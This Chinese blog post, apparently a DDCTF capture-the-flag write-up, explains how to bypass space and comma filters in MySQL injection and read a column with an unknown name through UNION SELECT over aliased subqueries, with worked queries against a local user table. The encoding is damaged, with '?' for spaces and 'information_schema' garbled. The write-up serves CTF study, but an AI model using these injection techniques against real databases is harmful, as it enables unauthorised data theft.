這篇文章主要給大家介紹了mysql如何巧妙的繞過未知字段名的相關(guān)資料,文中給出了詳細(xì)的示例代碼供大家參考學(xué)習(xí),對學(xué)習(xí)mysql具有一定的參考學(xué)習(xí)價值,需要的朋友們下面來一起看看吧。
前言
本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機(jī)來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細(xì)的介紹:
實現(xiàn)思路
題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;
存放flag的字段名未知,inmysqlmation_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用mysql,過程如下:
思想就是獲取flag,讓其在已知字段名下出現(xiàn);
示例代碼:
mysql>?select?(select?1)a,(select?2)b,(select?3)c,(select?4)d; +---+---+---+---+ |?a?|?b?|?c?|?d?| +---+---+---+---+ |?1?|?2?|?3?|?4?| +---+---+---+---+ 1?row?in?set?(0.00?sec) ? mysql>?select?*?from?(select?1)a,(select?2)b,(select?3)c,(select?4)d; +---+---+---+---+ |?1?|?2?|?3?|?4?| +---+---+---+---+ |?1?|?2?|?3?|?4?| +---+---+---+---+ 1?row?in?set?(0.00?sec) ? mysql>?select?*?from?(select?1)a,(select?2)b,(select?3)c,(select?4)d?union?select?*?from?user; +---+-------+----------+-------------+ |?1?|?2??|?3??|?4???| +---+-------+----------+-------------+ |?1?|?2??|?3??|?4???| |?1?|?admin?|?admin888?|?110@110.com?| |?2?|?test?|?test123?|?119@119.com?| |?3?|?cs?|?cs123?|?120@120.com?| +---+-------+----------+-------------+ 4?rows?in?set?(0.01?sec) ? mysql>?select?e.4?from?(select?*?from?(select?1)a,(select?2)b,(select?3)c,(select?4)d?union?select?*?from?user)e; +-------------+ |?4???| +-------------+ |?4???| |?110@110.com?| |?119@119.com?| |?120@120.com?| +-------------+ 4?rows?in?set?(0.03?sec) ? mysql>?select?e.4?from?(select?*?from?(select?1)a,(select?2)b,(select?3)c,(select?4)d?union?select?*?from?user)e?limit?1?offset?3; ? +-------------+ |?4???| +-------------+ |?120@120.com?| +-------------+ 1?row?in?set?(0.01?sec) ? mysql>?select?*?from?user?where?id=1?union?select?(select?e.4?from?(select?*?from?(select?1)a,(select?2)b,(select?3)c,(select?4)d union?select?*?from?user)e?limit?1?offset?3)f,(select?1)g,(select?1)h,(select?1)i; +-------------+----------+----------+-------------+ |?id???|?username?|?password?|?email??| +-------------+----------+----------+-------------+ |?1???|?admin?|?admin888?|?110@110.com?| |?120@120.com?|?1??|?1??|?1???| +-------------+----------+----------+-------------+ 2?rows?in?set?(0.04?sec)
總結(jié)
? 版權(quán)聲明
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載。
THE END
.png)
